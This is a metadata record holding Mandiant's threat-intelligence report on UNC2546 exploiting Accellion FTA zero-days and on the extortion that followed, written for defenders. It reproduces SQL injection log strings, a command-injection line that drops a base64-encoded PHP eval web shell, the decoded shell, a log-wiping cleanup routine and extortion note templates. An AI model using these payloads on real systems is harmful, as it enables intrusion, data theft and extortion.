{
	"id": "632e6e9c-ac30-461f-a576-3ae932d2bebf",
	"created_at": "2026-04-06T00:12:08.266118Z",
	"updated_at": "2026-04-10T03:30:21.218415Z",
	"deleted_at": null,
	"sha1_hash": "55cd03d8316092650707a6101b02735642e5d106",
	"title": "Threat Actors Exploit Accellion FTA for Data Theft and Extortion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 130441,
	"plain_text": "Threat Actors Exploit Accellion FTA for Data Theft and Extortion\r\nBy Mandiant\r\nPublished: 2021-02-22 · Archived: 2026-04-05 14:39:07 UTC\r\nWritten by: Andrew Moore, Genevieve Stark, Isif Ibrahima, Van Ta, Kimberly Goody\r\nStarting in mid-December 2020, malicious actors that Mandiant tracks as UNC2546 exploited multiple zero-day\r\nvulnerabilities in Accellion’s legacy File Transfer Appliance (FTA) to install a newly discovered web shell named\r\nDEWMODE. The motivation of UNC2546 was not immediately apparent, but starting in late January 2021, several\r\norganizations that had been impacted by UNC2546 in the prior month began receiving extortion emails from actors\r\nthreatening to publish stolen data on the “CL0P^_- LEAKS\" .onion website. Some of the published victim data appears\r\nto have been stolen using the DEWMODE web shell.\r\nNotably, the number of victims on the “CL0P^_- LEAKS\" shaming website has increased in February 2021 with\r\norganizations in the United States, Singapore, Canada, and the Netherlands recently outed by these threat actors.\r\nMandiant has previously reported that FIN11 has threatened to post stolen victim data on this same .onion site as an\r\nadditional tactic to pressure victims into paying extortion demands following the deployment of CLOP ransomware.\r\nHowever, in recent CLOP extortion incidents, no ransomware was deployed nor were the other hallmarks of FIN11\r\npresent.\r\nWe are currently tracking the exploitation of the zero-day Accellion FTA vulnerabilities and data theft from companies\r\nrunning the legacy FTA product as UNC2546, and the subsequent extortion activity as UNC2582. We have identified\r\noverlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships\r\nbetween these clusters of activity. 
For more information on our use of ‘UNC’ designations, see our blog post,\r\n\"DebUNCing Attribution: How Mandiant Tracks Uncategorized Threat Actors.\"\r\nMandiant has been working closely with Accellion in response to these matters and will be producing a complete security\r\nassessment report in the coming weeks. At this time, Accellion has patched all FTA vulnerabilities known to be exploited\r\nby the threat actors and has added new monitoring and alerting capabilities to flag anomalies associated with these attack\r\nvectors. Mandiant has validated these patches. Mandiant is currently performing penetration testing and code review of\r\nthe current version of the Accellion FTA product and has not found any other critical vulnerabilities in the FTA product\r\nbased on our analysis to date. Accellion customers using the FTA legacy product were the targets of the attack.\r\nAccellion FTA is a 20-year-old product nearing end of life. Accellion strongly recommends that FTA customers migrate\r\nto kiteworks, Accellion’s enterprise content firewall platform. Per Accellion, Kiteworks is built on an entirely different\r\ncode base.\r\nThe following CVEs have since been reserved for tracking the recently patched Accellion FTA vulnerabilities:\r\nCVE-2021-27101 - SQL injection via a crafted Host header\r\nCVE-2021-27102 - OS command execution via a local web service call\r\nCVE-2021-27103 - SSRF via a crafted POST request\r\nCVE-2021-27104 - OS command execution via a crafted POST request\r\nhttps://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html\r\nPage 1 of 7\n\nUNC2546 and DEWMODE\r\nIn mid-December 2020, Mandiant responded to multiple incidents in which a web shell we call DEWMODE was used to\r\nexfiltrate data from Accellion FTA devices. The Accellion FTA device is a purpose-built application designed to allow an\r\nenterprise to securely transfer large files. 
The exfiltration activity has affected entities in a wide range of sectors and\r\ncountries.\r\nAcross these incidents, Mandiant observed common infrastructure usage and TTPs, including exploitation of FTA devices\r\nto deploy the DEWMODE web shell. Mandiant determined that a common threat actor we now track as UNC2546 was\r\nresponsible for this activity. While complete details of the vulnerabilities leveraged to install DEWMODE are still being\r\nanalyzed, evidence from multiple client investigations has shown multiple commonalities in UNC2546's activities.\r\nEvidence of Exploitation and DEWMODE Installation\r\nMandiant has been able to reconstruct many of the details about how Accellion FTAs have been compromised through\r\nexamination of Apache and system logs from impacted devices—from initial compromise, to deployment of\r\nDEWMODE, and follow-on interaction.\r\nThe earliest identification of activity associated with this campaign occurred in mid-December 2020. At this time,\r\nMandiant identified UNC2546 leveraging an SQL injection vulnerability in the Accellion FTA. 
This SQL injection served\r\nas the primary intrusion vector.\r\nMandiant observed evidence of SQL injection followed by subsequent requests to additional resources, as shown in\r\nFigure 1.\r\n[.'))union(select(c_value)from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#9700968/initial] (1) pass th\r\n['))union(select(loc_id)from(net1.servers)where(proximity)=(0))#/sid#935ee00][rid#9706978/initial] (1) pass through /co\r\n[.'))union(select(reverse(c_value))from(t_global)where(t_global.c_param)=('w1'))#/sid#935ee00][rid#971c098/initial] (1)\r\n[\u003credacted\u003e/sid#935ee00][rid#971a090/initial] (1) pass through /courier/sftp_account_edit.php\r\n[\u003credacted\u003e/sid#935ee00][rid#9706978/initial] (1) pass through /courier/oauth.api\r\n[\u003credacted\u003e/sid#935ee00][rid#9708980/initial] (1) pass through /courier/oauth.api\r\nFigure 1: SQL injection log\r\nUNC2546 has leveraged this SQL injection vulnerability to retrieve a key which appears to be used in conjunction with a\r\nrequest to the file sftp_account_edit.php. 
Immediately after this request, the built-in Accellion utility admin.pl was\r\nexecuted, resulting in an eval web shell being written to oauth.api.\r\nPWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --edit_user=F\r\n--mount_cifs=-\r\nV,DF,$(echo${IFS}PD9waHAKCmlmKGlzc2V0KCRfUkVRVUVTVFsndG9rZW4nXSkpCnsKICAgIGV2YWwoYm\r\nFzZTY0X2RlY29kZSgkX1JFUVVFU1RbJ3Rva2VuJ10pKTsKfQplbHNlIGlmKGlzc2V0KCRfUkVRVUVTVFsnd\r\nXNlcm5hbWUnXSkpCnsKICAgIHN5c3RlbSgkX1JFUVVFU1RbJ3VzZXJuYW1lJ10pOwp9CmVsc2UKewogICAgaG\r\nVhZGVyKCdMb2NhdGlvbjogLycpOwp9|base64${IFS}-d|tee${IFS}/home/seos/courier/oauth.api);FUK;\",PASSWORD # \\\" --passwd=pop\r\nFigure 2: Excerpt from log showing creation of eval web shell\r\nThe decoded contents are shown in Figure 3.\r\n\u003c?php\r\nif(isset($_REQUEST['token']))\r\n{\r\n eval(base64_decode($_REQUEST['token']));\r\n}\r\nelse if(isset($_REQUEST['username']))\r\n{\r\n system($_REQUEST['username']);\r\n}\r\nelse\r\n{\r\n header('Location: /');\r\n}\r\nFigure 3: Decoded eval web shell\r\nAlmost immediately following this sequence, the DEWMODE web shell is written to the system. The timing of these\r\nrequests suggests that DEWMODE was delivered via the oauth.api web shell; however, the available evidence does not\r\nindicate the exact mechanism used to write DEWMODE to disk.\r\nMandiant has identified the DEWMODE web shell in one of the following two locations:\r\n/home/seos/courier/about.html\r\n/home/httpd/html/about.html\r\nThe DEWMODE web shell (Figure 4) extracts a list of available files from a MySQL database on the FTA and lists those\r\nfiles and corresponding metadata—file ID, path, filename, uploader, and recipient—on an HTML page. UNC2546 then\r\nuses the presented list to download files through the DEWMODE web shell. 
Download requests are captured in the FTA’s\r\nweb logs, which will contain requests to the DEWMODE web shell with encrypted and encoded URL parameters, where\r\ndwn is the file path and fn is the requested file name (Figure 5). The encrypted file path and name values visible in web\r\nlogs can be decrypted using key material obtained from the database used by the targeted FTA. Given the complex nature\r\nof this process, if your organization needs assistance reviewing relevant logs, please contact Mandiant or Accellion.\r\nFigure 4: DEWMODE web shell screenshot\r\nGET /courier/about.html?dwn=[REDACTED]\u0026fn=[REDACTED] HTTP/1.1\" 200 1098240863 \"-\" \"-\" \"-\" TLSv1.2 ECDHE-RSA-AES128-SHA\r\nFigure 5: DEWMODE File Download URL parameters\r\nFollowing file downloads, UNC2546 initiates a cleanup routine by passing a specific query parameter named csrftoken\r\nwith the value 11454bd782bb41db213d415e10a0fb3c to DEWMODE. 
The following actions are performed:\r\nA shell script is written to /tmp/.scr, which will:\r\nRemove all references to about.html from log files located in /var/opt/apache/\r\nWrite the modified log file to /tmp/x then replace the original log file at /var/opt/apache/\r\nDelete the contents of the /home/seos/log/adminpl.log log file.\r\nRemove /home/seos/courier/about.html (DEWMODE) and /home/seos/courier/oauth.api (eval web shell),\r\nand redirect command output to the file /tmp/.out\r\nChange the permissions of the output file to be readable, writeable and executable by all users, and set the\r\nowner to “nobody”\r\nDelete the script file /tmp/.scr and other temporarily created files to assist in cleanup\r\nDisplay cleanup output to the requesting user\r\nAn example of a cleanup request and subsequent execution of the cleanup script can be seen in Figure 6.\r\nGET /courier/about.html?csrftoken=11454bd782bb41db213d415e10a0fb3c HTTP/1.1\" 200 5 \"-\" \"https://[REDACTED]//courier/ab\r\nsft sudo: nobody : TTY=unknown ; PWD=/home/seos/courier ; USER=root ; COMMAND=/usr/local/bin/admin.pl --mount_cifs=AF\r\nFigure 6: DEWMODE cleanup request\r\nMandiant also identified a variant of DEWMODE (bdfd11b1b092b7c61ce5f02ffc5ad55a) which contained minor\r\nchanges to the cleanup operation, including wiping of /var/log/secure and removing about.html and oauth.api from the\r\ndirectories /home/httpd/html/ instead of /home/seos/courier/.\r\nIn a subset of incidents, Mandiant observed UNC2546 requesting a file named cache.js.gz (Figure 7). Based on temporal\r\nfile access to the mysqldump utility and mysql data directories, the archive likely contained a dump of the database. 
With\r\nthe exception of cache.js.gz, Mandiant has not observed UNC2546 acquiring files from Accellion appliances through any\r\nmethod besides DEWMODE.\r\nGET //courier/cache.js.gz HTTP/1.1\" 200 35654360 \"-\" \"-\" \"python-requests/2.24.0\" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256\r\nFigure 7: cache.js.gz file request\r\nUNC2582 Data Theft Extortion\r\nShortly after installation of the web shell, in multiple cases within hours, UNC2546 leveraged DEWMODE to download\r\nfiles from compromised FTA instances. While the actors’ motivations were not immediately clear, several weeks after\r\ndelivery of the DEWMODE web shell, victims began to receive extortion emails from an actor claiming association with\r\nthe CLOP ransomware team (Figure 8 and Figure 9). The actors threatened to publish data on the \"CL0P^_- LEAKS\"\r\n.onion shaming website, unless the victim paid an extortion fee. We are tracking the subsequent extortion activity under a\r\nseparate threat cluster, UNC2582. Despite tracking the exploitation and extortion activity in separate threat clusters we\r\nhave observed at least one case where an actor interacted with a DEWMODE web shell from a host that was used to send\r\nUNC2582-attributed extortion email.\r\nHello!\r\nYour network has been hacked, a lot of valuable data stolen. \u003cdescription of stolen data, including the total\r\nsize of the compressed files\u003e We are the CLOP ransomware team, you can google news and articles about\r\nus. We have a website where we publish news and stolen files from companies that have refused to\r\ncooperate. Here is his address http://[redacted].onion/ - use TOR browser or\r\nhttp://[redacted].onion.dog/ - mirror. We are visited by 20-30 thousand journalists, IT experts, hackers\r\nand competitors every day. 
We suggest that you contact us via chat within 24 hours to discuss the current\r\nsituation. \u003cvictim-specific negotiation URL\u003e - use TOR browser We don't want to hurt, our goal is money.\r\nWe are also ready to provide any evidence of the presence of files with us.\r\nFigure 8: Extortion Note Template 1\r\nThis is the last warning!\r\nIf you don’t get in touch today, tomorrow we will create a page with screenshots of your files (like the others on our\r\nDo not let this happen, write to us in chat or email and we will discuss the situation!\r\nCHAT: \u003cvictim-specific negotiation URL\u003e\r\nEMAIL: unlock@support-box.com\r\nUSE TOR BROWSER!\r\nFigure 9: Extortion Note Template 2\r\nBased on observations at several engagements, UNC2582 appears to follow a pattern of escalation to pressure victims\r\ninto paying extortion demands. Initial emails are sent from a free email account, likely unique per victim, to a seemingly\r\nlimited distribution of addresses at the victim organization. If the victim does not respond in a timely manner, additional\r\nemails are sent to a much larger number of recipients from hundreds or thousands of different email accounts and using\r\nvaried SMTP infrastructure. In at least one case, UNC2582 also sent emails to partners of the victim organization that\r\nincluded links to the stolen data and negotiation chat. Monitoring of the CL0P^_- LEAKS shaming website has\r\ndemonstrated that UNC2582 has followed through on threats to publish stolen data as several new victims have appeared\r\non the site in recent weeks, including at least one organization that has publicly confirmed that their Accellion FTA\r\ndevice had been recently targeted.\r\nKey Overlaps With FIN11\r\nUNC2582 (Extortion) and FIN11\r\nMandiant identified overlaps between UNC2582’s data theft extortion activity and prior FIN11 operations, including\r\ncommon email senders and the use of the CL0P^_- LEAKS shaming site. 
While FIN11 is known for deploying CLOP\r\nransomware, we have previously observed the group conduct data theft extortion without ransomware deployment,\r\nsimilar to these cases.\r\nSome UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts\r\nused by FIN11 in multiple phishing campaigns between August and December 2020, including some of the last\r\ncampaigns that were clearly attributable to the group.\r\nWe have not observed FIN11 phishing activity in the new year. FIN11 has typically paused their phishing\r\noperations over the winter holidays and had several extended gaps in their operations. However, the timing of this\r\ncurrent hiatus is also consistent with UNC2582’s data theft extortion activity.\r\nUNC2582 extortion emails contained a link to the CL0P^_- LEAKS website and/or a victim specific negotiation\r\npage. The linked websites were the same ones used to support historical CLOP operations, a series of ransomware\r\nand data theft extortion campaigns we suspect can be exclusively attributed to FIN11.\r\nUNC2546 (FTA Exploitation and DEWMODE) and FIN11\r\nThere are also limited overlaps between FIN11 and UNC2546.\r\nMany of the organizations compromised by UNC2546 were previously targeted by FIN11.\r\nAn IP address that communicated with a DEWMODE web shell was in the \"Fortunix Networks L.P.\" netblock, a\r\nnetwork frequently used by FIN11 to host download and FRIENDSPEAK command and control (C2) domains.\r\nImplications\r\nThe overlaps between FIN11, UNC2546, and UNC2582 are compelling, but we continue to track these clusters\r\nseparately while we evaluate the nature of their relationships. One of the specific challenges is that the scope of the\r\noverlaps with FIN11 is limited to the later stages of the attack life cycle. 
UNC2546 uses a different infection vector and\r\nfoothold, and unlike FIN11, we have not observed the actors expanding their presence across impacted networks. We\r\ntherefore have insufficient evidence to attribute the FTA exploitation, DEWMODE, or data theft extortion activity to\r\nFIN11. Using SQL injection to deploy DEWMODE or acquiring access to a DEWMODE shell from a separate threat\r\nactor would represent a significant shift in FIN11 TTPs, given the group has traditionally relied on phishing campaigns as\r\nits initial infection vector and we have not previously observed them use zero-day vulnerabilities.\r\nAcknowledgements\r\nDavid Wong, Brandon Walters, Stephen Eckels and Jon Erickson\r\nIndicators of Compromise (IOCs)\r\nDEWMODE Web Shells\r\nMD5 SHA256\r\n2798c0e836b907e8224520e7e6e4bb42 5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b\r\nbdfd11b1b092b7c61ce5f02ffc5ad55a 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nUNC2546 Source IP Addresses\r\nThe following source IP addresses were observed in multiple UNC2546 intrusions:\r\n45.135.229.179\r\n79.141.162.82\r\n155.94.160.40\r\n192.154.253.120\r\n192.52.167.101\r\n194.88.104.24\r\nDetections\r\nFireEye Detections\r\nFE_Webshell_PHP_DEWMODE_1\r\nFEC_Webshell_PHP_DEWMODE_1\r\nWebshell.PHP.DEWMODE\r\nMandiant Security Validation\r\nA101-515 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #1\r\nA101-516 Malicious File Transfer - DEWMODE Webshell, Upload, Variant #2\r\nDEWMODE YARA Rule\r\nThe following YARA rule is not intended to be used on production systems or to inform blocking rules without first being\r\nvalidated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of\r\nfalse positives. 
This rule is intended to serve as a starting point for hunting efforts to identify DEWMODE payloads;\r\nhowever, it may need adjustment over time if the malware family changes.\r\nrule DEWMODE_PHP_Webshell\r\n{\r\n strings:\r\n $s1 = /if \\(isset\\(\\$_REQUEST\\[[\\x22\\x27]dwn[\\x22\\x27]]\\)[\\x09\\x20]{0,32}\u0026\u0026[\\x09\\x20]{0,32}isset\\(\\$_REQUEST\\[[\r\n $s2 = \"\u003cth\u003efile_id\u003c/th\u003e\"\r\n $s3 = \"\u003cth\u003epath\u003c/th\u003e\"\r\n $s4 = \"\u003cth\u003efile_name\u003c/th\u003e\"\r\n $s5 = \"\u003cth\u003euploaded_by\u003c/th\u003e\"\r\n $s6 = \"target=\\\\\\\"_blank\\\\\\\"\u003eDownload\u003c/a\u003e\u003c/td\u003e\"\r\n $s7 = \"Content-Type: application/octet-stream\"\r\n $s8 = \"Content-disposition: attachment; filename=\"\r\n condition:\r\n all of them\r\n}\r\nSource: https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html"
	],
	"report_names": [
		"accellion-fta-exploited-for-data-theft-and-extortion.html"
	],
	"threat_actors": [
		{
			"id": "6728f306-6259-4e7d-a4ea-59586d90a47d",
			"created_at": "2023-01-06T13:46:39.175292Z",
			"updated_at": "2026-04-10T02:00:03.236282Z",
			"deleted_at": null,
			"main_name": "FIN11",
			"aliases": [
				"TEMP.Warlock",
				"UNC902"
			],
			"source_name": "MISPGALAXY:FIN11",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1db21349-11d6-4e57-805c-fb1e23a8acab",
			"created_at": "2022-10-25T16:07:23.630365Z",
			"updated_at": "2026-04-10T02:00:04.694622Z",
			"deleted_at": null,
			"main_name": "FIN11",
			"aliases": [
				"Chubby Scorpius",
				"DEV-0950",
				"Lace Tempest",
				"Operation Cyclone"
			],
			"source_name": "ETDA:FIN11",
			"tools": [
				"AZORult",
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"BLUESTEAL",
				"Cl0p",
				"EMASTEAL",
				"FLOWERPIPE",
				"FORKBEARD",
				"FRIENDSPEAK",
				"FlawedAmmyy",
				"GazGolder",
				"Get2",
				"GetandGo",
				"JESTBOT",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MINEDOOR",
				"MIXLABEL",
				"Meterpreter",
				"NAILGUN",
				"POPFLASH",
				"PuffStealer",
				"Rultazo",
				"SALTLICK",
				"SCRAPMINT",
				"SHORTBENCH",
				"SLOWROLL",
				"SPOONBEARD",
				"TiniMet",
				"TinyMet",
				"VIDAR",
				"Vidar Stealer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434328,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55cd03d8316092650707a6101b02735642e5d106.pdf",
		"text": "https://archive.orkl.eu/55cd03d8316092650707a6101b02735642e5d106.txt",
		"img": "https://archive.orkl.eu/55cd03d8316092650707a6101b02735642e5d106.jpg"
	}
}